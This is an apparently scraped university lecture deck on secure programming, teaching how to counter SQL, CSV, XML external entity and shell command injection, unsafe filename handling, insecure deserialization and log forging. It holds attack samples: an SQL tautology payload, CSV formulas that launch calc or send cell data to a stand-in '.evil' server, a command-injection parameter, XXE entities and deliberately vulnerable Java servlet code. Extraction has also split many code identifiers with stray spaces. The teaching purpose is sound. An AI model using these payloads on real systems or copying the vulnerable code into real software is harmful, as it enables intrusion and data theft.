SWE 681 ISA 681 Secure Software Design Programming

Abstract view of a program Input Program Output Process Data (Structured Program Internals) Call-out

The XKCD cartoon on SQL injection Randall Munroe, “Exploits of a Mom”, XKCD, https:

Outline • General issues • Focus on metacharacters & issues of: – SQL (countering

No Man (or Program) is an Island • Practically no program is truly self-contained

Be careful about the components/ services your program trusts • What components/services you trust…

Call only safe library routines • You want to reuse libraries – But their

AJAX & JSON • AJAX = “Asynchronous Java. Script and XML” – Common set

Don’t just “eval” untrusted data… JSON is an example • In general, don’t run

Limit call-outs to valid values • Ensure any call out to another program only

Metacharacters • Metacharacters = characters in an input that are not interpreted as data

SQL – Getting Connected in Java import java. sql. *; class Execute. Sql. Query

SQL – How to do it wrong … // User input search_lastname: String Query.

SQL Query: Intent & Actual • Intent of programmer is to create: select *

SQL Injection • SQL injection = attack where: – An attacker inserts data –

SQL injection: Other common attacks • Massive variation in SQL interpreters – SQL “standard”

Solution for SQL Injection: Prepared statements • “Prepared statement” to identify placeholders – Pre-existing

Java “prepare. Statement” method • public interface “Connection” represents a connection (session) with a

Prepared statements example (Java) String Query. String = "select * from authors where lastname

Warning: “prepare. Statement” can be misused, too!! • Prepared statements only work if all

Other (SQL) injection countermeasures • Writing your own escape code – Be careful –

Not just SQL • Nearly all database systems (SQL or not) support languages –

Comma Separated Value (CSV) Injection • CSV format is very simple: User. Id, Bill.

XML: Check formatting • Lots of data/messages formatted using XML • “Well-formed”: Follows certain

XML Vulnerability: External Entities / External References • In XML supports external references which

Command shell • Most systems have at least one command shell – – •

Unix-like shell metacharacters • Shell metacharacter list is long; one list is: & ;

SAMATE 1596 (1) – Unix-like // SAMATE 1596 - CWE-077: Failure to Sanitize Data

SAMATE 1596 (2) – Unix-like import java. lang. Runtime; import java. io. *; import

SAMATE 1596 (3) – Unix-like String user = req. get. Parameter("user"); if(user != null)

Example of bad code on Windows String btype = request. get. Parameter("backuptype"); String cmd

Storing data: Databases & simple files • Databases (e. g. , SQL) provide many

Common data type passed elsewhere: Pathnames • Pathname = how to find file system

Windows Pathnames: Difficult to make secure • Windows pathname interpretations vary depending on: –

Unix-like filenames • Unix-like systems in practice allow almost any sequence of bytes as

First, a POSIX shell specific issue: Variable quoting • POSIX (Bourne) shell references need

POSIX filenames: How to do it wrongly (one-directory) • One-directory example 1: cat *

POSIX filenames: How to do it wrongly (multiple-directories) • POSIX “find” is usual mechanism

POSIX filenames: How to do it wrongly (multiple-directories) • Multi-directory example 4: ( find.

POSIX filenames: How to do it right • Prefix all globs/filenames so they cannot

Correct glob use #1 (one directory) # Prefix glob (do this in any language)

Correct find use • Quick ways to use find: find. . . -exec COMMAND.

File walking in shell – a simpler alternative, but with a caveat • If

More information on Unix-like pathnames • “Filenames and Pathnames in Shell: How to do

Windows-specific file content problems • Windows Binary vs. Text file semantics – “Text” often

Introduction: Insecure Deserialization / Demarshalling • Deserialization = convert stream of bytes/characters back into

Examples where Insecure Deserialization could happen • Java’s Serializable format • Python’s “pickle” library

Countering insecure deserialization • Use data-only formats (e. g. , JSON) – instead of

Quick aside: “Assume breach” paradigm • Depending only on prevention doesn’t work – Some

“Assume Breach”: The “new” paradigm? • “Assume breach” mindset can help, but it depends

Detection & recovery’s impact on design & implementation • Recovery: Plan for it –

Calling out to logging/debugging systems • Centralize all logging/debugging, use consistently – Simplifies analysis

Mature programs log often • Logging is pervasive in mature code – “On average,

When to log • Logging systems are only useful if the important events are

If you must roll your own logging/debugging system • Record date/time & source –

Log/debug entries can become security vulnerabilities • Data destined for logs may include untrusted

Log forging example (1) // Do not do this: String val = request. get.

Log forging example (2) • But if attacker submits “val” value of: twenty-one%0 a%0

Protect logs • Prevent read or write log access by untrusted users – Logs

Do not include passwords & other sensitive data in logs • Logs should normally

Display attacks • Many displays simulate long-gone consoles – ESCAPE + codes can change

Call Only Interfaces Intended for Programmers • Usually unwise to invoke a program intended

Check All System Call Returns • Check every system call that can return an

Check information when it returns • Reuse input filtering concepts from earlier… values from

Counter Web Bugs When Retrieving Embedded Content • Some data formats (e. g. ,

Hide Sensitive Information (1) • Hide sensitive information (e. g. , private, personallyidentifying information,

Hide Sensitive Information (2) • Don’t send it, if you don’t have to –

Conclusions • In practice, must depend on other components – Libraries, OS, DBMS, etc.

Released under CC BY-SA 3. 0 • This presentation is released under the Creative

Slides: 69

Download presentation

SWE 681 / ISA 681 Secure Software Design & Programming: Lecture 5: Calling Out to Other Components (including injection) Dr. David A. Wheeler 2020 -11 -14

Abstract view of a program Input Program Output Process Data (Structured Program Internals) Call-out to other programs (also consider input & output issues) You are here 2

The XKCD cartoon on SQL injection Randall Munroe, “Exploits of a Mom”, XKCD, https: //xkcd. com/327/ Included under the conditions of https: //xkcd. com/license. html 3

Outline • General issues • Focus on metacharacters & issues of: – SQL (countering “SQL injection”) – CSV – Command/shell (countering “command injection”) – Filenames • Insecure deserialization • Assume breach, detect/respond, & logs • Check what you get back 4

No Man (or Program) is an Island • Practically no program is truly self-contained • Nearly all programs depend on/call out to other programs for resources – – Operating systems Software Libraries Local services Remote services (DNS, web servers, tile servers, etc. ) • Sometimes dependency is not obvious – Transitive dependency (A depends on B depends on C …) – Leads to dependencies on many components/hidden infrastructure – E. G. , dynamic libraries, kernel modules, language run-times, C run-time, remote webserver operating systems, etc. 5

Be careful about the components/ services your program trusts • What components/services you trust… and how much? • What do you send to them (output to them)? – Read the documentation – what’s allowed/supported? – Does the component trust its data, e. g. , does it autodownload refs or execute embedded code? – Encode/filter as necessary • How do you send data? – Alternatives? Encrypted channels? • What do you accept back (input from them)? – How much do you trust the results? Maybe check it! • How do you accept it back, and what happens if it takes too long? 6

Call only safe library routines • You want to reuse libraries – But their specifications may not guarantee that they’re secure – Their specification may even guarantee they’re insecure – Implementation may be insecure on your platform/environment • Prefer libraries that guarantee what you want – Use the right library – e. g. , don’t use eval(), use something specialized – E. g. , when parsing JSON with Java. Script, use JSON. parse() not eval() • Sometimes you can wrap a routine to do what you need • Where possible, test if it provides capabilities you need for security – Perform test in compilation, installation, and/or at start-up • You may sometimes need to re-implement a library if it’s insecure – If you can’t be sure, re-implement – It is your users who are hurt if you choose an insecure library – You are responsible for the libraries/infrastructure you choose 7

AJAX & JSON • AJAX = “Asynchronous Java. Script and XML” – Common set of technologies/techniques • Often uses JSON = Java. Script Object Notation – For data serialization, original spec RFC 4627 • JSON example: { "first. Name": "David", "last. Name": "Wheeler", "address": { "street. Address": "1600 Pennsylvania Ave", "city": "Washington", "state": "DC" JSON doesn’t allow trailing commas } (JSON 5 does) } 8

Don’t just “eval” untrusted data… JSON is an example • In general, don’t run “eval” with untrusted data • Most JSON-formatted text also syntactically legal Java. Script code – “Easy” way to parse data in Java. Script is via eval() – Incorrect - doesn’t support some Unicode characters • Security vulnerability if data & Javascript environment not controlled by single trusted source – E. G, . malicious Javascript attack, application forgery, etc. • In general, don’t “eval” untrusted data!!! – In Java. Script, instead use newer function JSON. parse() • Mozilla Firefox 3. 5+, MS IE 8+, Opera 10. 5+, Google Chrome, Safari 9

Limit call-outs to valid values • Ensure any call out to another program only permits valid and expected values for every parameter – Including libraries, daemons, remote servers • This is more difficult than it sounds – Many library calls or commands call other components in potentially surprising ways • Don’t always clearly document exactly what’s safe • Result: Need to be conservative – Common problem: Metacharacters 10

Metacharacters • Metacharacters = characters in an input that are not interpreted as data – Metacharacters instead control how the other characters are interpreted – May be commands, delimiters of data, etc. • If there's a language specification, it has metacharacters • Examples: – SQL: the single-quote ' can begin/end a string – POSIX shell: $ can begin a parameter reference, e. g. , $HOME • If your program allows attackers to insert such metacharacters, don’t pass them on unescaped – You often must allow metacharacters through (“O'Mally”) 11

SQL – Getting Connected in Java import java. sql. *; class Execute. Sql. Query { public static void main(String[] args) { // In real code, use try {…} catch () … to deal with database connection failure, etc. String connection. URL = "jdbc: mysql: //localhost: 3306/mydatabase"; // Load JDBC driver for My. SQL (for example): Class. for. Name("com. mysql. jdbc. Driver"). new. Instance(); // Connect given connection. URL, username, password: Connection connection = Driver. Manager. get. Connection(connection. URL, "root"); // What’s wrong with this password handling approach? Statement statement = connection. create. Statement(); Result. Set rs = null; 12

SQL – How to do it wrong … // User input search_lastname: String Query. String = "select * from authors where lastname = ' " + search_lastname + " ' "; // data surrounded by single-quotes rs = statement. execute. Query(Query. String); while (rs. next()) { System. out. println(rs. get. String(2) + "n"); } // … eventually close … rs. close(); statement. close(); This string concatenation, followed by an connection. close(); execution, takes the untrusted user input } data & passes it directly to an interpreter. Bad idea. 13

SQL Query: Intent & Actual • Intent of programmer is to create: select * from authors where lastname = 'user_input' • Imagine attacker provides, as input value: name' OR 'a'='a • Resulting query is: select * from authors where lastname = 'name' OR 'a'='a' • Last part always true, so whole table returned • Single quote is a SQL metacharacter 14

SQL Injection • SQL injection = attack where: – An attacker inserts data – That will eventually be supplied to a SQL interpreter – In a way where that data will be misinterpreted (e. g. as a metacharacter) • Previous input example, name' OR 'a'='a, is an example of a SQL injection attack 15

SQL injection: Other common attacks • Massive variation in SQL interpreters – SQL “standard” isn’t – So attacks vary depending on interpreter • Common sequences in SQL injection attacks: – Single/double quote (as already seen) – Using “; ” as command separator • Insert whole new commands after separator – Using “--” as comment token • Specify “ignore material afterwards” & foil limiting text • Again, don’t try to create a blacklist 16

Solution for SQL Injection: Prepared statements • “Prepared statement” to identify placeholders – Pre-existing library then escapes it properly – Properly-implemented Object-Relational Mapping (ORM) systems internally use prepared statements • Many advantages – Library does the escaping for you – simpler, more likely to get right – Tends to produce easier-to-maintain code – Tends to execute faster – Especially important for SQL – different SQL engines can have different rules 17

Java “prepare. Statement” method • public interface “Connection” represents a connection (session) with a specific database – SQL statements executed & results are returned within context of a connection • Includes method Prepared. Statement prepare. Statement(String sql) throws SQLException … – Creates a Prepared. Statement object for sending prepared SQL statements to the database • has the effect of escaping metacharacters in each parameter – “sql” is an SQL statement that may contain one or more '? ' IN parameter placeholders 18

Prepared statements example (Java) String Query. String = "select * from authors where lastname = ? "; Prepared. Statement pstmt = connection. prepare. Statement(Query. String); // Set first param - library escapes it pstmt. set. String(1, search_lastname); Result. Set results = pstmt. execute( ); 19

Warning: “prepare. Statement” can be misused, too!! • Prepared statements only work if all input influenced by untrusted users is actually prepared – E. g. , substituted as “? ” in query string & set. String • Don’t do this (where search_lastname is untrusted): String Query. String = "select * from authors where lastname = ' " + search_lastname + " ' "; Prepared. Statement pstmt = connection. prepare. Statement(Query. String); Result. Set results = pstmt. execute( ); I’m using prepared statements, so nothing can go wrong … 20

Other (SQL) injection countermeasures • Writing your own escape code – Be careful – identify characters that must not or don’t need escaping (e. g. , alphanumerics) & escape everything else (whitelist) – Rules vary depending on SQL engine & its version – Don’t do this with SQL – use libraries designed for purpose! • Stored procedures – can help prevent SQL injection attacks – By limiting types of statements that can be passed to their parameters – However, attackers can often work around those limits – Can prevent some attacks, but by themselves they don’t counter SQL injection (you still have to escape, etc. ) • Prevent metacharacters from getting in as input (input validation) – If you can, do it. ASCII alphanumerics are normally not metachars – Input validation often cannot be sole countermeasure; often must accept some metacharacters (e. g. , '). Input validation not enough – Do not depend solely on input validation to counter injection • Mistakes too easily made & future mods may require removing restrictions 21

Not just SQL • Nearly all database systems (SQL or not) support languages – At least for queries • So need to prevent metacharacter misinterpretation – Use a prepared statement library if you can – If none available, consider creating one – At least create escaping library - easily check & reuse Metacharacters also show up in CSV, XML, command shell, etc. 22

Comma Separated Value (CSV) Injection • CSV format is very simple: User. Id, Bill. To. Date, Project. Name, Description, Duration. Minutes 1, 2017 -07 -25, Test Project, Flipped the jibbet, 60 2, 2017 -07 -25, Important Client, "Bop, dop, and giglip", 240 2, 2017 -07 -25, Important Client, "=2+5+cmd|' /C calc'!A 0", 240 2, 2017 -07 -25, Important Client, "=IMPORTXML(CONCAT(""http: //someserver-with-log. evil? v="", CONCATENATE(A 2: E 2)), ""//a"")", 240 • Spreadsheets often used to read CSV files but they may execute formulas in CSV files (e. g. , if begin with “=“) – Some executions request confirmation, but users often do – IMPORTXML & others enable no-confirmation exfiltration – Esp. problematic: fields starting with =, +, -, @ Source: “The Absurdly Underestimated Dangers of CSV Injection”, George Mauer, 7 October, 2017 http: //georgemauer. net/2017/10/07/csv-injection. html 23

XML: Check formatting • Lots of data/messages formatted using XML • “Well-formed”: Follows certain syntax rules – E. G. , all opened tags are closed, nesting ok – Check before using from untrusted sources! • “Valid”: Meets some schema definition – Check for validity before using untrusted input • Eliminates many problems – schema == whitelist – Don’t let attacker determine what schema to use! • Decide what schema is okay & use that 24

XML Vulnerability: External Entities / External References • In XML supports external references which can be auto-loaded, e. g. : <!DOCTYPE html PUBLIC "-//W 3 C//DTD XHTML 1. 1//EN" "http: //www. w 3. org/TR/xhtml 11/DTD/xhtml 11. dtd"> <!DOCTYPE letter [ <!ENTITY part 1 SYSTEM "http: //www. example. com/part 1. xml"> <!ENTITY part 2 SYSTEM ". . /secrets/part 2. xml"> ]> … <building> &part 1; &part 2; </building> • Don’t accept unchecked external references from untrusted sources • Possible solutions: – Configure XML reader to ignore external references (& TEST that!) – Forbid or check (with whitelist) external reference before use – Don’t use XML, SOAP (which uses XML), etc. This is #4 vulnerability on the OWASP top 10 of 2017 (XML External Entities (XXE)) 25 https: //www. owasp. org/index. php/Top_10 -2017_A 4 -XML_External_Entities_(XXE)

Command shell • Most systems have at least one command shell – – • • Useful for quickly combining programs, query, debugging, etc. Unix-like systems: e. g. , /bin/sh, bash, dash, ksh, csh Windows: e. g. , cmd. exe, Power. Shell Command shell idea originally from MULTICS (1960 s) Many metacharacters, and shell can call other commands Useful… but easy to make mistakes – Only use when you really need its capability & be cautious doing so • Several library calls may call command shell – – system(3), popen(3); sometimes execlp(3) and execvp(3) Perl & shell backtick (`); Python os. system() Java java. lang. Runtime. get. Runtime(). exec() In C, execve(3) does not invoke shell • Use execve(3), not system(3), if you don’t need full system(3) functionality • Many programs have mechanisms to invoke commands too – Mail, vim, emacs, …. 26

Unix-like shell metacharacters • Shell metacharacter list is long; one list is: & ; ` ' " | * ? ~ < > ^ ( ) [ ] { } $ n r • Yet that list is known to be wrong, e. g. : – – Space & tab: normal separators # is comment (all rest on line ignored) ! means “not” in some contexts & history in others Leading “-” on parameter may be considered option • Whitelist – escape non-alphanumerics • Other commands have own character set and may need to escape through shell too – Escape in right order, so that it’s actually escaped 27

SAMATE 1596 (1) – Unix-like // SAMATE 1596 - CWE-077: Failure to Sanitize Data into a Control Plane (Command Injection) at line 44, 45 /* Description: Tainted input allows command execution. Keywords: Port Java Size 0 Complex 0 Taint Unsafe Invalid. Param: "user=bogus; ls -l /" Valid. Param: user=root Copyright 2005 Fortify Software. Permission is hereby granted, without written agreement or royalty fee, to use, copy, modify, and distribute this software and its documentation for any purpose, provided that the above copyright notice and the following three paragraphs appear in all copies of this software. IN NO EVENT SHALL FORTIFY SOFTWARE BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF FORTIFY SOFTWARE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMANGE. FORTIFY SOFTWARE SPECIFICALLY DISCLAIMS ANY WARRANTIES INCLUDING, BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THE SOFTWARE IS PROVIDED ON AN "AS-IS" BASIS AND FORTIFY SOFTWARE HAS NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS. */ 28

SAMATE 1596 (2) – Unix-like import java. lang. Runtime; import java. io. *; import javax. servlet. http. *; public class Proc 1_bad extends Http. Servlet { public void do. Get(Http. Servlet. Request req, Http. Servlet. Response res) throws Servlet. Exception, IOException { res. set. Content. Type("text/html"); Servlet. Output. Stream out = res. get. Output. Stream(); out. println("<HTML><HEAD><TITLE>Test</TITLE></HEAD><BODY>< blockquote><pre>"); 29

SAMATE 1596 (3) – Unix-like String user = req. get. Parameter("user"); if(user != null) { try { String[] args = { "/bin/sh", "-c", "finger " + user }; // Uh oh!!!! Process p = Runtime. get. Runtime(). exec(args); // Disaster here. Buffered. Reader fingdata = new Buffered. Reader(new Input. Stream. Reader(p. get. Input. Stream())); String line; while((line = fingdata. read. Line()) != null) out. println(line); p. wait. For(); } catch(Exception e) { throw new Servlet. Exception(e); } } else { out. println("specify a user"); } out. println("</pre></blockquote></BODY></HTML>"); out. close(); } } 30

Example of bad code on Windows String btype = request. get. Parameter("backuptype"); String cmd = new String("cmd. exe /K "c: \util\rman. DB. bat " + btype + “&&c: \utl\cleanup. bat""); Runtime. get. Runtime(). exec(cmd); Again, data from untrusted user is used, unescaped, as part of larger command – disaster. Source: “Secure Programming with Static Analysis”, Chess & West, page 168 31

Storing data: Databases & simple files • Databases (e. g. , SQL) provide many useful functions – E. G. , arbitrary query – Enable storage of field data • But using them means that your program depends on potentially-complex DBMS – Need to set up / configure – May have its own vulnerabilities, etc. – You have to include lower-level kernel anyway • If simple files work for storage (e. g. , with filenames as key), may want to use them for storage – Can be faster, simpler. Directory structures can simplify much – But not if you start rewriting a DBMS (!) – Design decision (DBMS vs. files), but either involves calling out 32

Common data type passed elsewhere: Pathnames • Pathname = how to find file system object – Unix-like: Sequence of 1+ filenames separated by “/” • Pathnames often partly controlled by untrusted user – Often useful to use file/directory names as a key to identify relevant data, can lead to untrusted user controlling filenames – Monitoring/management of VM/shared system – untrusted monitoree controls filenames – Defense-in-depth: Counter attacker who gets in part way – Need to protect… so need to know about filename issues • Obvious case: Don’t allow redirection outside dir – E. G. , if whitelist allowed “. ”, “/”, and maybe “” – problem! – “trusted_root_path + username” might go somewhere unexpected if username is “. . /mysecrets” – As always, use limited whitelist for info used to create filenames 33

Windows Pathnames: Difficult to make secure • Windows pathname interpretations vary depending on: – Version of Windows – API used (some use Create. File, support \. ) • “letter: …” and “\servershare. . . ” have special meaning • Nasty issue: reserved names in files – Built-in reserved device names: CON, PRN, AUX, NUL, COM 1, COM 2, COM 3, COM 4, COM 5, COM 6, COM 7, COM 8, COM 9, LPT 1, LPT 2, LPT 3, LPT 4, LPT 5, LPT 6, LPT 7, LPT 8, and LPT 9 – Even worse, drivers can create more reserved names (!) – Avoid reserved names with/without extension. . if attacker can trick into reading/writing (e. g. , com 1. txt), may (depending on API) cause r/w to device – In this case, even simple alphanumerics can cause disaster (rare situation!) • Directory separator and / ( widely used for escapes) • Don’t end a file or directory name with space or period – Underlying file system may support, but Windows shell & user interface don’t • More info: http: //msdn. microsoft. com/en-us/library/aa 365247. aspx 34

Unix-like filenames • Unix-like systems in practice allow almost any sequence of bytes as a pathname – Separated by “/”, terminated by – Case sensitive (normally) • So yes, they allow problematic filenames with: – – Spaces Control characters (including tab, newline, escape) Non-characters (e. g. , non-UTF-8) Leading “-” (option marker) • Problematic filenames can cause trouble later • Some additional problem happen when using shell – Filename problems not limited to shell 35

First, a POSIX shell specific issue: Variable quoting • POSIX (Bourne) shell references need to be quoted if variable can include input separators – Separators are space, tab, newline by default • So this is usually wrong: cat $filename – If $filename might include space, tab, or newline, it will be split into multiple filenames • So if you use a Bourne shell to process filenames: – Always quote variable references unless known the variable cannot have the space, tab, or newline characters: cat "$filename" – Set IFS to just newline & tab (no space) early on, e. g. : IFS="$(printf 'nt')" – Do both if can (defense-in-depth); IFS change may require other changes 36

POSIX filenames: How to do it wrongly (one-directory) • One-directory example 1: cat * >. . /collection # WRONG – Fails if a filename begins with “-” (e. g. , “-n”) – This can happen in any language • One-directory example 2: for file in * ; do # WRONG cat "$file" >>. . /collection done – Also fails if filename begins with “-” – Fails if no files (will loop on file named “*”) • Primarily a problem in shell (glob libraries simplify this) 37

POSIX filenames: How to do it wrongly (multiple-directories) • POSIX “find” is usual mechanism for walking directories – – Automatically inserts directory name in front Leading “-” can’t happen if directory name doesn’t start with “-” “Easy” ways often fail with space, newline, tab (often split up) If a produced filename contains “*” etc. , then when $(…) returns, shell will try to expand using that (“set –f” disables this) • Multi-directory example 1: cat $(find. -type f) >. . /collection # WRONG – Fails if file contains space, tab, newline • Multi-directory example 2: ( for file in $(find. -type f) ; do # WRONG cat "$file" done ) >. . /collection – Same problem • Multi-directory example 3: ( for file in $(find. -type f) ; do cat "$file" done ) >. . /collection # WRONG – Same problem 38

POSIX filenames: How to do it wrongly (multiple-directories) • Multi-directory example 4: ( find. -type f | xargs cat ) >. . /collection # WRONG – Wrong. By default, xargs’ input is parsed, so space characters (as well as newlines) separate arguments, and the backslash, apostrophe, double-quote, and ampersand characters are used for quoting • Multi-directory example 5: ( find. -type f | while IFS="" read -r filename ; do cat "$filename" done ) >. . /collection # WRONG – Wrong. Ok if filenames can’t include newline – If filenames can include newline, then any line-at-a-time processing of filenames fails 39

POSIX filenames: How to do it right • Prefix all globs/filenames so they cannot begin with "-" when expanded – Add “. /” prefix, etc. , as needed • Handle any filename byte sequence – Including tab, newline, escape, non-UTF-8 – Filenames are sequences of bytes, not characters • Beware of printing filenames – “Escape” control character may control other things – Newline/tab/space may separate surprisingly – Non-UTF-8: Unix-like don’t guarantee printability – “<” and “&” if output to HTML/XML 40

Correct glob use #1 (one directory) # Prefix glob (do this in any language) with. / # Check if file exists (more important in shell) for file in. /* ; do # Use ". /*", NEVER "*" if [ -e "$file" ] ; then # Prevent empty match COMMAND. . . "$file". . . fi done 41

Correct find use • Quick ways to use find: find. . . -exec COMMAND. . . {} ; find. . . -exec COMMAND. . . {} + • Nonstandard but common find/xargs extensions: find. -print 0 | xargs -0 COMMAND • Nonstandard extensions to find/shell (bash ok): find. -print 0 | while IFS="" read -r -d "" file ; do. . . COMMAND "$file" # Use quoted "$file", not $file done 42

File walking in shell – a simpler alternative, but with a caveat • If IFS doesn’t include space (per above), and filenames cannot include tab/newline… • Then shell patterns like this work just fine: set –f # Need so “*” in filenames not expanded for file in $(find. ) ; do COMMAND "$file". . . done • Simpler – but only if you can guarantee it • Alternative – try, & skip files with control chars: controlchars="$(printf '*[01 -37177]*')" set -f for file in $(find. ! –name "$controlchars"') 43

More information on Unix-like pathnames • “Filenames and Pathnames in Shell: How to do it correctly” http: //www. dwheeler. com/essays/filenames-in-shell. html • “Fixing Unix/Linux/POSIX Filenames: Control Characters (such as Newline), Leading Dashes, and Other Problems” http: //www. dwheeler. com/essays/fixing-unix-linux-filenames. html 44

Windows-specific file content problems • Windows Binary vs. Text file semantics – “Text” often requires extra translations on input & output • Windows text files use the CP/M line-ending convention CRLF • Most other systems/languages use 1 -char line-ending (LF) • Yes, there are rare alternatives (IBM NEL, pre-Mac. OS-X CR) – Can lead to misinterpretation or data corruption • If translates when it shouldn’t, or doesn’t when it should • E. G. , n in C/C++/Java often has to be converted back & forth • Character encoding – Many nonstandard Windows encodings (e. g. , 1252, etc. ) – Many files use a UTF-16 -style encoding (byte order!) – Guessing common in Windows apps… yet can easily go wrong • Many programs use Win 32 charset detection function Is. Text. Unicode • Especially bad pre-Vista (“Bush hid the facts” or “this app can break”) • More recent tweaks make less likely, but fundamental problem still there – Can lead to mojibake (aka “character salad”)/misinterpretation 45

Introduction: Insecure Deserialization / Demarshalling • Deserialization = convert stream of bytes/characters back into a copy of the original object • Applications/APIs may request deserialization of hostile or tampered objects from attacker – Typically by calling some deserialization library, which may be hidden within a larger system • Most deserialization attacks can be subdivided as: 1. 2. Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization. Typical data tampering attacks such as access-control-related attacks where existing data structures are used but the content is changed [OWASP] OWASP 2017 top ten #8 is Insecure deserialization; see also CWE-502. More: https: //www. owasp. org/index. php/Top_10 -2017_A 8 -Insecure_Deserialization 46

Examples where Insecure Deserialization could happen • Java’s Serializable format • Python’s “pickle” library (can recreate objects) • Remote- and inter-process communication (RPC/IPC) • Wire protocols, web services, message brokers • HTTP cookies – If serialize object to cookie, deserialize cookie later, & cookie signature unchecked 47

Countering insecure deserialization • Use data-only formats (e. g. , JSON) – instead of formats that can embed arbitrary objects – only deals with case #1, object and data structure related attacks • Only deserialize data with trusted signature – If an attacker could have created/modified it, don’t trust it – Must verify signature first! – Your application could be signer – if so, can use (fast) shared secret MAC algorithm (secret shared with self) • Don’t let attacker control data to be deserialized • Input validation – but beware, poor approach – Hard to do correctly, so in general unreliable 48

Quick aside: “Assume breach” paradigm • Depending only on prevention doesn’t work – Some attackers do break through all protections – Esp. if software wasn’t designed & implemented to be secure (most software today) • “Assume breach” mindset: – “limits the trust placed in applications, services, identities and networks… – by treating them all—both internal and external— as not secure and probably already compromised” Source: “The Assume Breach paradigm” – https: //www. eventtracker. com/newsletters/the-assume-breach-paradigm/ 49

“Assume Breach”: The “new” paradigm? • “Assume breach” mindset can help, but it depends on how it’s applied – Larger networks are best presumed breached (too big to prevent) • If everything is actually always breached, you end up with the ridiculous: – Can’t do anything useful - no secure state to recover back to & use – Detecting often expensive (auto not enough) & always misses some things – Recovering after-the-fact is often expensive & sometimes impossible • Some say “assume breach” to justify failing to prevent attacks at all, even when it’s cheaper & more effective as it often is (bad!) • Some say “assume breach” to: – Ensure that resources are also spent on detection & recovery (good!) – Ensure that “least privilege” design principle is applied (good!) • Focusing only on prevention – or only on detection & recovery – has always been bad – “Least privilege” is a 1970 s S&S principle, it’s certainly not new – Prevention often cheaper: Ounce of prevention still worth a pound of cure – Prevention reduces attacker successes, makes detection & recovery practical Need total package: prevention and also detection & recovery 50

Detection & recovery’s impact on design & implementation • Recovery: Plan for it – E. g. , backup your data, enable reset back to safe/known state, implement “degraded” state(s) (e. g. , “read only” mode), enable migration to alternative systems/services, user notification system (“we’re sorry to inform you…”) – Rate limiting can often detect & auto-recover (by request IP address, login ID, etc. ) - limits over period of time can auto-handle burstiness – Often the problem is doing it, not its technical complexity. . so ID those as security requirements, design, & do it in your system before needed • Detection: Key is logging (audit trails) – The logs can then be monitored, along with other indicators, to detect ongoing attacks – Detection important: often the trigger for recovery – “How to monitor for detection” outside our scope, but we do need to discuss how to make detection possible! – Thus, we need to discuss logging (an external system that is especially important for security) 51

Calling out to logging/debugging systems • Centralize all logging/debugging, use consistently – Simplifies analysis (all data in one place) – Eases change/reconfiguration • Log instead of revealing problem details to users – Ok to say there’s a problem, but don’t say too much – Attackers love it when you give them detailed data! – Record important successes & failures • Try to reuse existing log systems – Less code, easier to integrate, etc. – Existing ones: log 4 j, java. util. logging, syslog, . . . – Deployments typically want to centralize logs so they can easily combine data from multiple sources, change how & how much to log, where it’s stored, send to separate protected system, etc. 52

Mature programs log often • Logging is pervasive in mature code – “On average, every 30 lines of code contains one line of logging code. Similar density is observed in all the software we studied” – They studied widely-used OSS with at least 10 years of development history & large market share (#1 or #2), specifically Apache httpd, Open. SSH, Postgre. SQL, and Squid • Logging is beneficial for diagnosing production-run failures – “Log messages can speed up the diagnosis time of production-run failures by 2. 2 times” Source: D. Yuan, S. Park, and Y. Zhou. Characterizing logging practices in open-source software. In Proceedings of the 34 th International Conference on Software Engineering, ICSE’ 12, pages 102– 112, June 2012, http: //opera. ucsd. edu/paper/log_icse 12. pdf 53

When to log • Logging systems are only useful if the important events are logged • Log all important events, including: – Login, logout, & authorization changes – Anything possibly indicating an attack or attempt to work around defenses • Categorize messages so can operators can configure what gets logged in production 54

If you must roll your own logging/debugging system • Record date/time & source – Source = machine & application – Sub-second accuracy very helpful • Log(category, message) • Allow configuration of: – What to actually record (which categories) – Where to send it (file, remote system, etc. ) – What to do on “log full” (Throw away old? New? Stop running? ) • Escape messages … but try to reuse a good one instead (consider this list a checklist) 55

Log/debug entries can become security vulnerabilities • Data destined for logs may include untrusted user data – Including debugging systems – which will be used, since operational systems sometimes have problems • Attackers may intentionally create data that will create problems later, e. g. : – Crash/take over logging system – Forge log entries – Create attack on later retrieval • Many store ASCII text – In that case, encode all nonprintable chars (esp. control chars) so they’re something else, e. g. , URL-encode or ddd 56

Log forging example (1) // Do not do this: String val = request. get. Parameter("val"); try { int value = Integer. parse. Int(val); } catch (Number. Format. Exception) { log. info("Failed to parse val = " + val); } • If user submit “val” value of “twenty-one”, then this entry is logged: INFO: Failed to parse val=twenty-one 57

Log forging example (2) • But if attacker submits “val” value of: twenty-one%0 a%0 a. INFO: +User+logged+out%3 dbadguy • Then the log will falsely record: INFO: Failed to parse val=twenty-one INFO: User logged out=badguy • Possibly fooling later log viewers: – badguy “couldn’t” have done later actions – Make it appear things okay or confuse causes – Frame someone else 58

Protect logs • Prevent read or write log access by untrusted users – Logs usually sent to separate system in operation • Logs give away a lot, including: – What you’re looking at. . and what you aren’t – May include sensitive data • Logs useful for: – Debugging problems – Evidence of attack 59

Do not include passwords & other sensitive data in logs • Logs should normally be private, but: – Sometimes logs will be revealed to others – Recipient or recipient’s later use may be unauthorized • Thus, don’t include passwords & very sensitive data in logs • Beware of including data if might include passwords – Ensure URLs don’t include passwords! • If must include, log encrypted data (or use salted hash) • Example: IEEE log data breach – 99, 979 usernames + plaintext (!) passwords – Publicly available on their FTP server for at least one month prior to discovery 2012 -09 -18 – More info: http: //ieeelog. com/ 60

Display attacks • Many displays simulate long-gone consoles – ESCAPE + codes can change color, erase screen, sometimes even send a screen content back – Result: Merely displaying a filename or file content can cause command execution • Many systems store info in HTML/XML – May include Javascript, etc. , that is executed on display • Consider encoding data that users/admins might directly display later 61

